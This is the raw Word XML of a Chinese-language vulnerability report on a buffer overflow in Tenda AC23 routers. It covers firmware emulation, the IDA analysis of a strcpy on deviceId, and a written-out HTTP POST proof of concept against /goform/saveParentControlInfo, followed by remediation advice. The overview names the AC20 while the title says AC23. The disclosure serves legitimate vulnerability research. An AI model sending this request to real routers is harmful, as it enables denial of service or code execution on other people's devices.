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F044D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Tenda AC23路由器存在缓冲区溢出漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79899479">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>基础信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEFD160">
      <w:pPr>
        <w:pStyle w:val="8"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞厂商：深圳市吉祥腾达科技有限公司</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113E5F01">
      <w:pPr>
        <w:pStyle w:val="8"/>
      </w:pPr>
      <w:r>
        <w:t>厂商官网：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.tenda.com.cn/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6B596D">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>影响对象类型：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>路由器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1142009C">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>影响产品：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AC23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B723239">
      <w:pPr>
        <w:pStyle w:val="8"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">影响产品版本：&lt;= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>V16.03.07.52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCEB374">
      <w:pPr>
        <w:pStyle w:val="8"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(最新版)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1727C7">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>一、漏洞概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8C59AC">
      <w:pPr>
        <w:pStyle w:val="8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在Tenda AC20路由器发现存在缓冲区溢出漏洞，攻击者通过对请求路径/goform/saveParentControlInfo发送精心构造的http post报文即可触发，造成拒绝服务攻击甚至rce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0579BA92">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>二、漏洞详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6D74D8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从官网下载最新的固件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"https://www.tenda.com.cn/material/show/3264"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"https://www.tenda.com.cn/material/show/3889"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AC23 升级软件_腾达Tenda官方网站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DACE9E5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可以通过这个网站对其进行解压 https://zhiwanyuzhou.com/multiple_analyse/firmware/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301B7E0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定位到/bin/httpd文件，通过命令sudo chroot ./ ./qemu-mipsel-static ./bin/httpd对其进行环境仿真</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A56A42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6CD2FA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B2360E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7124700" cy="3261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2D2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B301C1D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6C2840FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D339DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CC4A26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14540" cy="4399915"/>
            <wp:effectExtent l="0" t="0" r="1016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CFE4"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环境启动之后，通过ida定位到漏洞位置 saveParentControlInfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BD0E6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发现对deviceId进行了取值，并且后面通过strcpy进行赋值导致存在缓冲区溢出的风险</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F50F21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7113905" cy="3987800"/>
            <wp:effectExtent l="0" t="0" r="1079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4D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D02F25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BC88EB7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B4B0F8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2994A5CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE574B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前提需要通过if判断</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E5F63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3B61D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12635" cy="2200910"/>
            <wp:effectExtent l="0" t="0" r="1206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9776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即v3和v4不相等即可，这里分别取a和b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2A9D5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F222B2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B73597">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79223A4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E32394A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A6E6243">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A89CDF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发包测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CA3C9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7108825" cy="4751705"/>
            <wp:effectExtent l="0" t="0" r="317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D2A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="600FCC5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0579B1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发现出现了段错误，确实造成了溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580439C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36AAB7B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23430" cy="2459355"/>
            <wp:effectExtent l="0" t="0" r="1270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343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06F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C62F9EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="496D3D20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="181818"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>漏洞 POC 或 EXP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170FFF41">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="181818"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24541E85">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="181818"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC34F6A">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POST /goform/saveParentControlInfo HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400C94A3">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Host: 192.168.102.145</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B975E26">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53307E82">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Accept: text/plain, */*; q=0.01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E121C07">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>X-Requested-With: XMLHttpRequest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258B16A5">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Referer: http://192.168.102.145/main.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB0DC77">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Accept-Encoding: gzip, deflate, br</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FCC467">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Accept-Language: zh-CN,zh;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793E1142">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EADF905">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC39A50">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Content-Length: 786</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F68F96">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46E49247">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>time=a-b&amp;deviceId=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252DC089">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>三、漏洞影响</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303B9472">
      <w:pPr>
        <w:pStyle w:val="8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t>攻击者可利用此漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>造成缓冲区溢出甚至</w:t>
      </w:r>
      <w:r>
        <w:t>执行任意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提升权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADCBB53">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>四、修复方案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3CE04E">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>联系相关厂商，获取安全补丁，及时进行漏洞修复</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA9F626">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>联系相关安全厂商，及时更新安全阻断策略</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DA946F">
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>临时对接口参数进行安全检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30800A68">
      <w:pPr>
        <w:pStyle w:val="8"/>
      </w:pPr>
      <w:r>
        <w:t>‍</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="30533863"/>
    <w:sectPr>
      <w:pgSz w:w="13380" w:h="16830"/>
      <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="1080" w:header="637" w:footer="6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●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="59ADCABA"/>
    <w:multiLevelType w:val="single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D4050"/>
    <w:rsid w:val="396764C6"/>
    <w:rsid w:val="3E6D019F"/>
    <w:rsid w:val="3F920F56"/>
    <w:rsid w:val="3FBE593B"/>
    <w:rsid w:val="408F77C2"/>
    <w:rsid w:val="446545B9"/>
    <w:rsid w:val="4AAB6635"/>
    <w:rsid w:val="4AD96341"/>
    <w:rsid w:val="5A8E2B4C"/>
    <w:rsid w:val="663E0BF4"/>
    <w:rsid w:val="780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qFormat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paragraph" w:styleId="3">
    <w:name w:val="heading 2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="348" w:after="190"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:b/>
      <w:kern w:val="2"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 3"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="348" w:after="170"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
      <w:b/>
      <w:kern w:val="2"/>
      <w:sz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dingdocnormal"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/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</Words>
  <Characters>1258</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1304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2025-08-11T08:07:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>稳如臧獒</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-02T09:42:14Z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eyJoZGlkIjoiOTFlNDA0ZWQ2ZWRkZjZlYzQ5NzA3ZDMyNmY2OTRkZmMiLCJ1c2VySWQiOiI4MzUzNjYwMDYifQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>4237ED1F9E704AEEBAF8C94C902ECADC_12</vt:lpwstr>
  </property>
</Properties>
</file>